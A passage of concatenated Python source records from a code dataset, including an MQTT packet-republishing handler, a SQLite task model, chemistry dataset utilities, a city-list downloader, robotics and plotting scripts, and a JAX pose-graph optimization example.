self.lastPublishTime = datetime.datetime.now()\r\n self.logger.info(\"MqttHandler::__init__: __init__ done completely\")\r\n \r\n def __on_connect__(self, client, userdata, flags, rc):\r\n #set up the subscriptions here but check the result code (rc argument) first\r\n self.logger.info(\"MqttHandler::__on_connect__: got request with rc=\" + repr(rc))\r\n if rc != 0:\r\n self.logger.info(\"Got code \" + repr(rc) + \"after trying to establish a connection\")\r\n self.mqtt_connected = False\r\n else:\r\n self.mqtt_connected = True\r\n \r\n def 
__on_disconnect__(self, client, userdata, rc):\r\n        #Stop the loop\r\n        self.mqtt_client.loop_stop()\r\n        self.logger.info(\"MqttHandler::__on_disconnect__: Got disconnected from MQTT server...\")\r\n        time.sleep(5)\r\n        sys.exit(1)\r\n    \r\n    def __on_message__(self, client, userdata, message):\r\n        pass\r\n    \r\n    def __on_packet__(self, packet):\r\n        #first try to print basic information about each packet to the log\r\n        self.logger.info(\"MqttHandler::__on_packet__: Packet received from\")\r\n        try:\r\n            self.logger.info(repr(packet.ip.host) + \" to \" + repr(packet.ip.dst))\r\n        except:\r\n            self.logger.info(\"error in retrieving ip infos from packet\")\r\n        #after that we need to extract the destination port as we are only interested in packets to a certain port\r\n        try:\r\n            dstport = packet.udp.dstport\r\n            dstport = int(dstport)\r\n        except:\r\n            self.logger.info(\"MqttHandler::__on_packet__: Unable to get destination port from UDP packet\")\r\n            return\r\n        #check if this packet is interesting for us\r\n        if dstport == 22460:\r\n            #yes it is!\r\n            self.logger.info(\"MqttHandler::__on_packet__: Packet for port 22460 detected, processing it now\")\r\n            #extract the data values from the raw data\r\n            data = extract_data.extract_data(packet.data.data)\r\n            if not self.mqtt_connected:\r\n                self.logger.info(\"MqttHandler::__on_packet__: MQTT client not connected, returning now\")\r\n                return\r\n            #time to publish...\r\n            self.lastPublishTime = datetime.datetime.now()\r\n            defaultQos = 1 #deliver at least once\r\n            UrlBase = (self.conf.get(\"Mqtt\",\"UrlBase\")).strip()\r\n            if UrlBase[-1] == \"/\":\r\n                UrlBase = UrlBase[:-1]\r\n            #Publish messages here\r\n            for key in data:\r\n                self.logger.info(\"MqttHandler::__on_packet__: Publishing data '\" + repr(data[key]) + \"' to \" + UrlBase+\"/\"+str(key))\r\n                self.mqtt_client.publish(topic=UrlBase+\"/\"+str(key), payload=data[key], qos=defaultQos, retain=False)\r\n            if len(data):\r\n                self.mqtt_client.publish(topic=UrlBase+\"/lastRefresh\", payload=repr(self.lastPublishTime), qos=defaultQos, retain=False)\r\n            self.logger.info(\"MqttHandler::__on_packet__: Packet processing done\")\r\n    \r\n    def loop(self):\r\n        #in this function all outgoing traffic (publish events) are generated\r\n        #this function MUST be called once from the main program!!\r\n        #alternatively it can be called in regular intervals but it does normally not return from the first call\r\n        self.logger.info(\"MqttHandler::loop: Begin\")\r\n        if self.capture == None:\r\n            self.capture = pyshark.LiveCapture(self.interfaceString, bpf_filter=self.bpfFilterString)\r\n        for packet in self.capture:\r\n            self.logger.info(\"MqttHandler::loop: Packet received\")\r\n            self.__on_packet__(packet)\r\n        self.logger.info(\"MqttHandler::loop: End\")\r\n        self.capture = None\r\n        time.sleep(5)\r\n        sys.exit(1)\r\n    \r\n    def __del__(self):\r\n        try:\r\n            self.mqtt_client.loop_stop()\r\n        except:\r\n            pass\r\n    \r\ndef innerLoop(iniFile):\r\n    logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO)\r\n    logger = logging.getLogger()\r\n    m = MqttHandler(iniFile)\r\n    logger.info(\"MqttHandler object successfully created, starting loop\")\r\n    m.loop()\r\n    #normally loop doesn't exit except there is an error. 
If there is an error\r\n #we get to the next line and exit with an error code that indicates the error\r\n sys.exit(1)\r\n \r\nif __name__ == \"__main__\":\r\n innerLoop(\"conf.ini\")\r\n ","sub_path":"src/mqtt_handler.py","file_name":"mqtt_handler.py","file_ext":"py","file_size_in_byte":7214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"69149023","text":"from app.main.db import get_db\nfrom app.main.util.dto import TaskDto\n\nfrom datetime import datetime, timedelta\n\napi = TaskDto.api\n\ndef mk_date(date_str):\n return datetime.date(datetime.strptime(date_str, '%Y-%m-%d'))\n\nclass Task:\n def __init__(self, uid):\n self.uid = uid\n self.title = None\n self.description = None\n self.due_date = None\n self.status = None\n\n @classmethod\n def from_payload(cls, payload):\n task = cls(None)\n task.title = payload['title']\n task.description = payload['description']\n task.due_date = mk_date(payload['due_date'])\n task.status = payload['status']\n\n return task\n\n @classmethod\n def from_sql_row(cls, row):\n task = cls(row['id'])\n task.title = row['title']\n task.status = row['status']\n task.due_date = row['due_date']\n task.description = row['description']\n\n return task\n\n def fetch_info(self):\n db = get_db()\n task = db.execute(\n 'SELECT * FROM task WHERE id = ?', (self.uid,)\n ).fetchone()\n if not task:\n return False\n self.title = task['title']\n self.description = task['description']\n self.due_date = task['due_date']\n self.status = task['status']\n\n return True\n\n def update(self, stat):\n if not self.fetch_info():\n api.abort(404)\n db = get_db()\n self.status = stat\n db.execute(\n 'UPDATE task SET status = ? WHERE id = ?', (self.status, self.uid)\n )\n db.commit()\n return {\n 'message': 'successfully updated',\n 'task_details': self.to_json()\n }\n\n def add(self):\n db = get_db()\n db.execute(\n 'INSERT INTO task (title, description, status, due_date) VALUES (?,?,?,?)',\n (self.title, self.description, self.status, self.due_date)\n )\n db.commit()\n return {'message':\"task added successfully\"}\n\n def delete(self):\n db = get_db()\n task = db.execute(\n 'SELECT id FROM task WHERE id = ?', (self.uid,)\n ).fetchone()\n if not task:\n api.abort(404)\n db.execute(\n 'DELETE FROM task WHERE id = ?', (self.uid,)\n )\n db.commit()\n return {'message':'task removed successfully'}\n\n def to_json(self):\n return {\n 'id': self.uid,\n 'title': self.title,\n 'due date': self.due_date.strftime('%Y-%m-%d'),\n 'description': self.description,\n 'status': self.status\n }\n","sub_path":"app/main/model/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"396341870","text":"\"\"\"\nA set of utility functions to help with loading datasets.\n\"\"\"\nfrom typing import Any, Dict, List, Union\n\nfrom openff.qcsubmit.datasets.datasets import (\n BasicDataset,\n OptimizationDataset,\n TorsiondriveDataset,\n)\nfrom openff.qcsubmit.exceptions import DatasetRegisterError, InvalidDatasetError\nfrom openff.qcsubmit.serializers import deserialize\n\nregistered_datasets: Dict[str, Any] = {}\n\n\ndef load_dataset(data: Union[str, Dict]) -> \"BasicDataset\":\n \"\"\"\n Create a new instance dataset from the file or dict of the dataset. 
This removes the need of knowing what the dataset type is.\n\n Parameters:\n data: The file path or dict of the dataset from which we should load the data.\n\n Raises:\n DatasetRegisterError: If no registered dataset can load the given dataset type.\n\n Returns:\n An instance of the correct dataset loaded with the data.\n \"\"\"\n if isinstance(data, str):\n # load the file\n raw_data = deserialize(data)\n else:\n raw_data = data\n\n dataset_type = registered_datasets.get(raw_data[\"dataset_type\"].lower(), None)\n if dataset_type is not None:\n return dataset_type(**raw_data)\n else:\n raise DatasetRegisterError(\n f\"No registered dataset can load the type {dataset_type}.\"\n )\n\n\ndef register_dataset(dataset: Any, replace: bool = False) -> None:\n \"\"\"\n Register a dataset with qcsubmit making it easy to auto load the model from file.\n\n Parameters:\n dataset: The dataset class that should be registered.\n replace: If the new dataset should replace any other dataset of the same type\n\n Raises:\n InvalidDatasetError: If the dataset is not a valid sub class of the basic dataset model\n DatasetRegisterError: If a dataset of this type has already been registered\n \"\"\"\n\n if issubclass(dataset, BasicDataset):\n dataset_type = dataset.__fields__[\"dataset_type\"].default.lower()\n\n if dataset_type not in registered_datasets or (\n dataset_type in registered_datasets and replace\n ):\n registered_datasets[dataset_type] = dataset\n else:\n raise DatasetRegisterError(\n f\"A dataset was already registered with the type {dataset_type}, to replace this use the `replace=True` flag.\"\n )\n\n else:\n raise InvalidDatasetError(\n f\"Dataset {dataset} rejected as it is not a valid sub class of the BasicDataset.\"\n )\n\n\ndef list_datasets() -> List[str]:\n \"\"\"\n Returns:\n A list of all of the currently registered dataset classes.\n \"\"\"\n return list(registered_datasets.values())\n\n\nregister_dataset(BasicDataset)\nregister_dataset(OptimizationDataset)\nregister_dataset(TorsiondriveDataset)\n","sub_path":"openff/qcsubmit/datasets/dataset_utils.py","file_name":"dataset_utils.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"516906974","text":"import os\nimport gzip\nimport json\nimport urllib3\n\nclass City (object):\n id: int\n name: str\n country: str\n\n def __init__(self, json_dict: dict):\n self.id = int(json_dict['id'])\n self.name = json_dict['name']\n self.country = json_dict['country']\n\n def __str__(self):\n return f\"ID #{self.id}, City: {self.name}, Country: {self.country}\"\n\n def __repr__(self):\n return self.__str__()\n\n @staticmethod\n def download_archive(url: str, destination_folder: str):\n archive_file = os.path.join(destination_folder, 'cities.gz')\n json_file = os.path.join(destination_folder, 'cities.json')\n\n if not os.path.exists(archive_file):\n print(\"Downloading cities archive from OpenWeather ...\")\n\n http = urllib3.PoolManager()\n request_content = http.request('GET', url, preload_content=False)\n\n with open(archive_file, 'wb') as gzip_file:\n for part in request_content.stream(128):\n gzip_file.write(part)\n\n request_content.release_conn()\n \n decompressed_content = gzip.open(archive_file).read()\n\n with open(json_file, 'wb') as json_output:\n json_output.write(decompressed_content)\n\n @staticmethod\n def get_list(export_dir: str):\n new_cities = []\n\n with open(os.path.join(export_dir, 'cities.json')) as json_file:\n json_data = 
json.load(json_file)\n\n for item in json_data:\n city = City(item)\n new_cities.append(city)\n\n return new_cities\n","sub_path":"lesson08/solution/libs/city.py","file_name":"city.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"27642782","text":"import json\nimport math\n#import PyKDL\n#import mathutils\nimport transformations\nimport numpy\n\ndef get_dh():\n file = open('Macierz_MD-G.json', 'r')\n dh = json.loads(file.read())\n return dh\n \n\ndef write_yaml(xyz, rpy, row, a, file, d):\n file.write(row + \":\\n\")\n if(row == \"row1\"):\n file.write(\" joint_xyz: \"+str(xyz[0])+\" \"+str(xyz[1])+\" \"+str(xyz[2]+1)+\"\\n\")\n else:\n file.write(\" joint_xyz: \"+str(xyz[0])+\" \"+str(xyz[1])+\" \"+str(xyz[2])+\"\\n\")\n \n file.write(\" joint_rpy: \"+str(rpy[0])+' '+str(rpy[1])+' '+str(rpy[2])+'\\n')\n file.write(\" link_xyz: \"+str(0)+' '+str(0)+' '+str(float(d)*(-0.5))+'\\n')\n file.write(\" link_rpy: \"+str(0)+' '+str(0)+' '+str(0)+'\\n')\n file.write(\" link_len: \"+str(d)+'\\n')\n\ndef get_xyz_rpy():\n\n\n# with open(\"dh_params.json\", \"r\") as file:\n# dh_params = json.load(file)\n\n dh = get_dh()\n \n yaml_file = open('urdf_wyniki.yaml', 'w')\n\n \n# rpy_xyz={}\n# inter = 1\n# iterator = 1\n\n# xyz_array = []\n# rpy_array = []\n# params_array = []\n\n for row in dh.keys():\n # dh_row = json.loads(json.dumps(row))\n a, d, alpha, theta = dh[row]\n #a_translation = transformations.translation_matrix((dh_row[\"a\"],0,0))\n #d_translation = transformations.translation_matrix((0,0,dh_row[\"d\"]))\n #alpha_rotation = transformations.rotation_matrix(dh_row[\"alpha\"],(1, 0, 0))\n #theta_rotation = transformations.rotation_matrix(dh_row[\"theta\"],(0, 0, 1))\n \n a_translation = transformations.translation_matrix((float(a),0,0))\n d_translation = transformations.translation_matrix((0,0,float(d)))\n alpha_rotation = transformations.rotation_matrix(float(alpha),(1, 0, 0))\n theta_rotation = transformations.rotation_matrix(float(theta),(0, 0, 1))\n \n trans_matrix = a_translation @ alpha_rotation @ theta_rotation @ d_translation\n rpy = transformations.euler_from_matrix(trans_matrix)\n xyz = transformations.translation_from_matrix(trans_matrix)\n # zapis danych\n write_yaml(xyz, rpy, row, a, yaml_file, d)\n\nif __name__ == '__main__':\n get_xyz_rpy()\n","sub_path":"anro3/urdf/dh_to_rpy.py","file_name":"dh_to_rpy.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"552865851","text":"\"\"\"Example for solving pose graph optimization problems loaded from `.g2o` files.\n\nFor a summary of options:\n\n python pose_graph_g2o.py --help\n\n\"\"\"\nimport argparse\nimport dataclasses\nimport enum\nimport pathlib\n\nimport _g2o_utils\nimport datargs\nimport matplotlib.pyplot as plt\n\nimport jaxfg\n\n\nclass SolverType(enum.Enum):\n GAUSS_NEWTON = jaxfg.solvers.GaussNewtonSolver()\n FIXED_ITERATION_GAUSS_NEWTON = jaxfg.solvers.FixedIterationGaussNewtonSolver(\n unroll=False\n )\n LEVENBERG_MARQUARDT = jaxfg.solvers.LevenbergMarquardtSolver()\n DOGLEG = jaxfg.solvers.DoglegSolver()\n\n @property\n def value(self) -> jaxfg.solvers.NonlinearSolverBase:\n \"\"\"Typed override for `enum.value`.\"\"\"\n value = super().value\n assert isinstance(value, jaxfg.solvers.NonlinearSolverBase)\n return value\n\n\n@datargs.argsclass(\n parser_params={\"formatter_class\": 
argparse.ArgumentDefaultsHelpFormatter}\n)\n@dataclasses.dataclass\nclass CliArgs:\n g2o_path: pathlib.Path = datargs.arg(\n positional=True,\n nargs=\"?\",\n default=pathlib.Path(__file__).parent / \"data/input_M3500_g2o.g2o\",\n help=\"Path to g2o file.\",\n )\n solver_type: SolverType = datargs.arg(\n default=SolverType.GAUSS_NEWTON,\n help=\"Nonlinear solver to use.\",\n )\n\n\ndef main():\n # Parse CLI args\n cli_args = datargs.parse(CliArgs)\n\n # Read graph\n with jaxfg.utils.stopwatch(\"Reading g2o file\"):\n g2o: _g2o_utils.G2OData = _g2o_utils.parse_g2o(cli_args.g2o_path)\n\n # Make factor graph\n with jaxfg.utils.stopwatch(\"Making factor graph\"):\n graph = jaxfg.core.StackedFactorGraph.make(g2o.factors)\n\n with jaxfg.utils.stopwatch(\"Making initial poses\"):\n initial_poses = jaxfg.core.VariableAssignments.make_from_dict(g2o.initial_poses)\n\n # Time solver\n if not isinstance(\n cli_args.solver_type.value, jaxfg.solvers.FixedIterationGaussNewtonSolver\n ):\n # `max_iterations` field exists for all solvers but the fixed iteration GN\n with jaxfg.utils.stopwatch(\"Single-step JIT compile + solve\"):\n solution_poses = graph.solve(\n initial_poses,\n solver=dataclasses.replace(\n cli_args.solver_type.value, max_iterations=1\n ),\n )\n solution_poses.storage.block_until_ready()\n\n with jaxfg.utils.stopwatch(\"Single-step solve (already compiled)\"):\n solution_poses = graph.solve(\n initial_poses,\n solver=dataclasses.replace(\n cli_args.solver_type.value, max_iterations=1\n ),\n )\n solution_poses.storage.block_until_ready()\n\n with jaxfg.utils.stopwatch(\"Full solve\"):\n solution_poses = graph.solve(initial_poses, solver=cli_args.solver_type.value)\n solution_poses.storage.block_until_ready()\n\n # Plot\n plt.figure()\n\n # Visualize 2D poses\n if isinstance(\n next(iter(solution_poses.get_variables())), jaxfg.geometry.SE2Variable\n ):\n plt.plot(\n *(\n initial_poses.get_stacked_value(jaxfg.geometry.SE2Variable)\n .translation()\n .T\n ),\n # Equivalent:\n # *(onp.array([initial_poses.get_value(v).translation() for v in pose_variables]).T),\n c=\"r\",\n label=\"Initial\",\n )\n plt.plot(\n *(\n solution_poses.get_stacked_value(jaxfg.geometry.SE2Variable)\n .translation()\n .T\n ),\n # Equivalent:\n # *(onp.array([solution_poses.get_value(v).translation() for v in pose_variables]).T),\n c=\"b\",\n label=\"Optimized\",\n )\n\n # Visualize 3D poses\n elif isinstance(\n next(iter(solution_poses.get_variables())), jaxfg.geometry.SE3Variable\n ):\n ax = plt.axes(projection=\"3d\")\n ax.set_box_aspect((1, 1, 1))\n ax.plot3D(\n *(\n initial_poses.get_stacked_value(jaxfg.geometry.SE3Variable)\n .translation()\n .T\n ),\n c=\"r\",\n label=\"Initial\",\n )\n ax.plot3D(\n *(\n solution_poses.get_stacked_value(jaxfg.geometry.SE3Variable)\n .translation()\n .T\n ),\n c=\"b\",\n label=\"Optimized\",\n )\n\n else:\n assert False\n\n plt.title(f\"Optimization on {cli_args.g2o_path.stem}\")\n plt.legend()\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/pose_graph_g2o.py","file_name":"pose_graph_g2o.py","file_ext":"py","file_size_in_byte":4619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"30582419","text":"import sys\r\nfrom math import ceil\r\nsys.stdin = open(\"swap.in\", 'r')\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n x = [int(i) for i in input().split()]\r\n c = 0\r\n for i in range(1, n+1):\r\n if i == x[i-1]:\r\n c += 1\r\n d = c //2 + c%2\r\n 
print(d)\r\n","sub_path":"G.py","file_name":"G.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"356896632","text":"class employee:\r\n    def __init__(self):\r\n        self.firstname=\"xyz\"\r\n        self.lastname=\"abc\"\r\n        self.salary=0.0\r\n    def get(self,fn,ln,s):\r\n        self.firstname=fn\r\n        self.lastname=ln\r\n        if(s>0):\r\n            self.salary=s\r\n        else:\r\n            print(\"Invalid salary\")\r\n            self.salary=int(input(\"enter again\"))\r\n    def show(self):\r\n        print(\"First Name = \",self.firstname)\r\n        print(\"Second Name = \", self.lastname)\r\n        print(\"Salary = \", self.salary)\r\n    def rais(self):\r\n        self.salary=self.salary+self.salary/10\r\ne1=employee()\r\ne2=employee()\r\nn=input(\"enter first name for e1 \")\r\nl=input(\"enter last name for e1 \")\r\ns=int(input(\"enter salary for e1 \"))\r\ne1.get(n,l,s)\r\nn=input(\"enter first name for e2 \")\r\nl=input(\"enter last name for e2 \")\r\ns=int(input(\"enter salary for e2 \"))\r\ne2.get(n,l,s)\r\ne1.show()\r\ne2.show()\r\nprint(\"After 10% raise\")\r\ne1.rais()\r\ne2.rais()\r\ne1.show()\r\ne2.show()\r\n\r\n\r\n","sub_path":"employee 2.py","file_name":"employee 2.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"220188172","text":"import sys\nimport matplotlib.pyplot as plt \nfrom decimal import Decimal, DecimalException\n\nfor j in range(1, len(sys.argv)):\n    f = open(sys.argv[j])\n    print(\"Opened argv number\", j, sys.argv[j])\n\n    for i, l in enumerate(f):\n        pass\n    f = open(sys.argv[j])\n\n    gps_lat_arr = [0] * (i + 1)\n    gps_long_arr = [0] * (i + 1)\n\n    lineDict = {}\n\n    idx = 0\n    for line in f:\n        lineDict[idx] = line.split(\",\")\n        try:\n            gps_lat_arr[idx] = Decimal(lineDict[idx][0])\n            gps_long_arr[idx] = Decimal(lineDict[idx][1])\n        except DecimalException as f:\n            continue\n        idx = idx+1\n\n    plt.plot(gps_long_arr, gps_lat_arr);\n    plt.xlabel('lat')\n    plt.ylabel('long')\n    plt.title('lat v long')\n    plt.show()","sub_path":"test_data/modified data/may29_bay/gps_plot.py","file_name":"gps_plot.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"500299915","text":"#!/usr/bin/env python \n\n## game/bedroom.py\n## ---\n## The class for representing the bedroom area in the game, along with the logic needed for each action.\n## Benjamin Williams \n##\n\n#Import referenced areas (connected)\nimport game.kitchen\n\n#Import utility classes\nfrom game.area import Area\nfrom game.util import sprint\nimport re;\n\n## The class for representing the bedroom area within the game.\nclass Bedroom(Area):\n\t\n\t#Static regex to match the entry string for this area.\n\tmatch = \".*(bedr\\w+).*\";\n\t\n\t#And the in/out bed states (whether the game has began or not)\n\tSTATE_IN_BED = 0;\n\tSTATE_OUT_OF_BED = 1;\n\t\n\t## Constructor for the bedroom class\n\tdef __init__(self, name):\n\t\n\t\t#Call superclass constructor\n\t\tsuper(Bedroom, self).__init__(name);\n\t\t\n\t\t#Set up introductory text (when the game is first ran).\n\t\tself.introText = \"\"\"\nYou wake up to the sounds of pigs outside, and the morning sun warming your face. This is a typical day for you, as a pig farmer. You are laying on your bed, fully awake. 
You need to get up out of bed to start your daily chores.\"\"\";\n\t\t\n\t\t#And the state of whether or not they're in bed, along with the note status\n\t\tself.state = self.STATE_IN_BED;\n\t\tself.noteBurned = False;\n\t\n\t## Checks whether or not the user can move to a specific area in this context of the current area.\n\tdef canMoveToArea(self, area):\n\n\t\t#If they want to go into the kitchen, they must be out of bed:\n\t\tif re.search(game.kitchen.Kitchen.match, area, re.IGNORECASE):\n\t\t\tif self.state == self.STATE_OUT_OF_BED:\n\t\t\t\treturn None;\n\t\t\n\t\t#Otherwise just return an error message.\n\t\treturn \"You cannot go here at this time.\";\n\t\t\n\t## Prints the introductory text\n\tdef printIntro(self):\n\t\n\t\t#If the game has just started, print the initial preamble out\n\t\tif self.state == self.STATE_IN_BED:\n\t\t\tsprint(self.introText);\n\t\t\t\n\t\t#Otherwise print the normal introductory text (when the area comes into focus)\n\t\telse:\n\t\t\tsprint(\"You enter the bedroom, there is a door to the kitchen, a mysterious note addressed to you and a mirror on the wall.\");\n\t\n\t## Matches each action against the user's input from stdin\n\tdef matchText(self, text):\n\t\t\n\t\tif self.state == self.STATE_IN_BED:\n\t\t\n\t\t\t#If they're in bed, and they wish to get out of bed:\n\t\t\tif re.match(r\"get\\s+(up|out)\\s*(from|out)?(of\\s+(the)?\\s+bed)?\", text, re.IGNORECASE):\n\t\t\t\tsprint(\"You got out of the bed. You look into a mirror and reel in horror - you've turned into the very pigs that you farm! Is this karma? An act of god? Why has this happened?\" + \n\t\t\t\t\"\\r\\n\\r\\nThinking to yourself, you must find out why you have turned into a pig with four trotters, a snout and a curly tail. You make an oath to search for the reason why this has happened, \" + \n\t\t\t\t\"and vow to return yourself to your normal human form.\", 0.005);\n\t\t\t\t\n\t\t\t\tsprint(\"\\r\\nYou look around for clues as to why this has happened. You are in a shack-like bedroom, with rustic memorabilia coating every inch of the walls. In the corner is the doorway to the\" + \n\t\t\t\t\" kitchen, and a mysterious note addressed to you is on your bedside drawer, next to a dimly-lit candle. There is also a mirror on the wall.\", 0.01);\n\t\t\t\t\n\t\t\t\t#Set their state to out of bed\n\t\t\t\tself.state = self.STATE_OUT_OF_BED;\n\t\t\t\t\n\t\t\t#Otherwise, call an invalid action - they can only get out of bed at this point.\n\t\t\telse:\n\t\t\t\tsuper(Bedroom, self).invalid_action();\n\t\t\t\n\t\t#Otherwise, they're out of bed:\n\t\telse:\n\t\t\t\n\t\t\t#If they wish to read the note:\n\t\t\tif re.match(r\"(look|read|take|pick)\\s+.*?(note|letter)\", text, re.IGNORECASE):\n\t\t\t\n\t\t\t\t#Is it burned? If not, read it out\n\t\t\t\tif not self.noteBurned:\n\t\t\t\t\tsprint(\"You read the note which is addressed to you. It says:\\r\\n\");\n\t\t\t\t\tsprint(\"\\\"Oink, oink oink oink, oink oink oink. Oink, Oink oink oink oink. Oink? Oink, oink, oink! 
- oink\\\"\");\n\t\t\t\t\tsprint(\"\\r\\nYou realise this note isn't of much use.\");\n\t\t\t\t\t\n\t\t\t\t#Otherwise tell them its burnt :(\n\t\t\t\telse:\n\t\t\t\t\tsprint(\"You try to read the note, but it is too badly burnt.\");\n\t\t\t\t\t\n\t\t\t#If they wish to burn the note \n\t\t\telif re.match(r\"burn\\s+.*?(note|letter)\", text, re.IGNORECASE):\n\t\t\t\tif self.noteBurned:\n\t\t\t\t\tsprint(\"You try to burn the note, only to notice that it's already burnt to a crisp.\");\n\t\t\t\telse:\n\t\t\t\t\tsprint(\"You burn the note by holding it next to the candle with your mouth. It burns for a few seconds, and eventually releases a plume of smoke.\");\n\t\t\t\t\tself.noteBurned = True;\n\t\t\t\t\t\n\t\t\t#If they want to look into the mirror\n\t\t\telif re.match(r\"look\\s+(in|at).*?\\s+mirror\", text, re.IGNORECASE):\n\t\t\t\tprint(\nr\"\"\"\n ___\n ',_`\"\"\\ .---,\n \\ :-\"\"``/` |\n `;' //`\\ /\n / __ | ('.\n |_ ./O)\\ \\ `) \\\n _/-. ` `\"` |`-.\n .-=; ` / `-.\n /o o \\ ,_, . '.\n L._._;_.-' . `'-.\n `'-.` ' `'-.\n `. ' `-._\n '-._. -' '.\n \\ `\\\n | \\\n | | ; _.\n \\ | | |-.((\n ;. \\ / / |-.`\\)\n | '. ; / | |(_) )\n | \\ \\ /` | ;'--'\n \\ '.\\ /` | /\n | /`| ; \\ /\n | | | |-._ '. .'\n / | | |__.`'---\"_;'-. .-'\n //__/ / | .-'`` _.-'`\n //__/ //___.--''` \n\n\"\"\");\n\t\t\t\tsprint(\"You look at yourself and think \\\"Wow, I nearly look good enough to eat!\\\".\");\n\t\t\t\t\n\t\t\t#The global command for looking around the current area, for this specific area.\n\t\t\telif re.match(r\"look around\", text, re.IGNORECASE):\n\t\t\t\tsprint(\"You are in a shack-like bedroom, with rustic memorabilia coating every inch of the walls. In the corner is the doorway to the\" + \n\t\t\t\t\" kitchen, and a mysterious note addressed to you is on your bedside drawer, next to a dimly-lit candle. 
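bedroom.py above gates every command on the current state plus a re.match/re.search pattern, one if/elif branch per action. The same logic can be factored into a table of (state, pattern, handler) entries, which keeps dispatch in one place as rooms grow; a minimal sketch of the pattern, not the game's actual structure (states and handler names here are illustrative):

import re

# (state, compiled pattern, handler name): table-driven command dispatch
COMMANDS = [
    ("IN_BED", re.compile(r"get\s+(up|out)", re.IGNORECASE), "get_up"),
    ("OUT_OF_BED", re.compile(r"(look|read|take|pick)\s+.*?(note|letter)", re.IGNORECASE), "read_note"),
    ("OUT_OF_BED", re.compile(r"burn\s+.*?(note|letter)", re.IGNORECASE), "burn_note"),
]

def dispatch(state, text):
    for cmd_state, pattern, handler in COMMANDS:
        if cmd_state == state and pattern.match(text):
            return handler
    return "invalid_action"

print(dispatch("IN_BED", "get up out of bed"))  # -> get_up
print(dispatch("OUT_OF_BED", "read the note"))  # -> read_note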
There is also a mirror on the wall.\");\n\t\t\t\n\t\t\t#Otherwise an invalid action was encountered:\n\t\t\telse:\n\t\t\t\tsuper(Bedroom, self).invalid_action();\n\t\t","sub_path":"project/game/bedroom.py","file_name":"bedroom.py","file_ext":"py","file_size_in_byte":6418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"532981731","text":"'''\nrough script for rendering two glyphs onto dna backbone\nneed to be moved outside the example directory \nat the same directory as render.py\n'''\n\nimport matplotlib.pyplot as plt\nimport render\n\n\n\ndef main():\n\tprint('executed')\n\tfig = plt.figure(figsize=(5,5))\n\tax = fig.add_subplot(111)\n\t# need to set axis first \n\tax.set_xlim(-50.0, 50.0)\n\tax.set_ylim(-50.0, 50.0)\n\n\tstrand = render.StrandRenderer()\n\trenderer = render.GlyphRenderer()\n\tp1 = renderer.draw_glyph(ax, 'Promoter', (-20.0, 0.0), 5., 0)\n\ti3 = renderer.draw_glyph(ax, 'Insulator', (20.0, -2.5), 5., 0.)\n\tstrand.add_glyphs([p1, i3])\n\tstrand.draw_backbone_strand(ax, 0.0, 2)\n\n\tax.set_axis_off()\n\tplt.show()\n\n\nif __name__ == '__main__':\n\tprint('what')\n\tmain()\n\n\n","sub_path":"dnaplotlib/examples/backbone.py","file_name":"backbone.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"203906669","text":"import shutil\nimport textwrap\nimport unicodedata\nfrom collections import defaultdict\n\nimport requests\nfrom blessed import Terminal\nfrom hrepr import HTML\nfrom tqdm import tqdm\n\nH = HTML()\nT = Terminal()\ntw = shutil.get_terminal_size((80, 20)).columns\n\n\nclass PaperoniError(Exception):\n pass\n\n\ndef print_field(title, contents, bold=False):\n \"\"\"Prints a line that goes 'title: contents', nicely formatted.\"\"\"\n contents = textwrap.fill(f\"{title}: {contents}\", width=tw)[len(title) + 2 :]\n title = T.bold_cyan(f\"{title}:\")\n contents = T.bold(contents) if bold else contents\n print(title, contents)\n\n\ndef join(elems, sep=\", \", lastsep=None):\n \"\"\"Create a list using the given separators.\n\n If lastsep is None, lastsep = sep.\n\n Returns:\n [elem0, (sep, elem1), (sep, elem2), ... 
(lastsep, elemn)]\n \"\"\"\n if lastsep is None:\n lastsep = sep\n elems = list(elems)\n if len(elems) <= 1:\n return elems\n results = [elems[0]]\n for elem in elems[1:-1]:\n results.extend((H.raw(sep), elem))\n results.extend((H.raw(lastsep), elems[-1]))\n return results\n\n\ndef download(url, filename):\n \"\"\"Download the given url into the given filename.\"\"\"\n print(f\"Downloading {url}\")\n r = requests.get(url, stream=True)\n total = int(r.headers.get(\"content-length\") or \"1024\")\n with open(filename, \"wb\") as f:\n with tqdm(total=total) as progress:\n for chunk in r.iter_content(chunk_size=total // 100):\n f.write(chunk)\n f.flush()\n progress.update(len(chunk))\n print(f\"Saved {filename}\")\n\n\ndef asciiify(s):\n \"\"\"Translate a string to pure ASCII, removing accents and the like.\n\n Non-ASCII characters that are not accented characters are removed.\n \"\"\"\n norm = unicodedata.normalize(\"NFD\", s)\n stripped = norm.encode(\"ASCII\", \"ignore\")\n return stripped.decode(\"utf8\")\n\n\ndef group_by(papers, key):\n \"\"\"Group a sequence by the result of a key function.\"\"\"\n groups = defaultdict(list)\n for p in papers:\n groups[key(p)].append(p)\n return groups\n\n\ndef normalize(s):\n if s is None:\n return None\n else:\n return 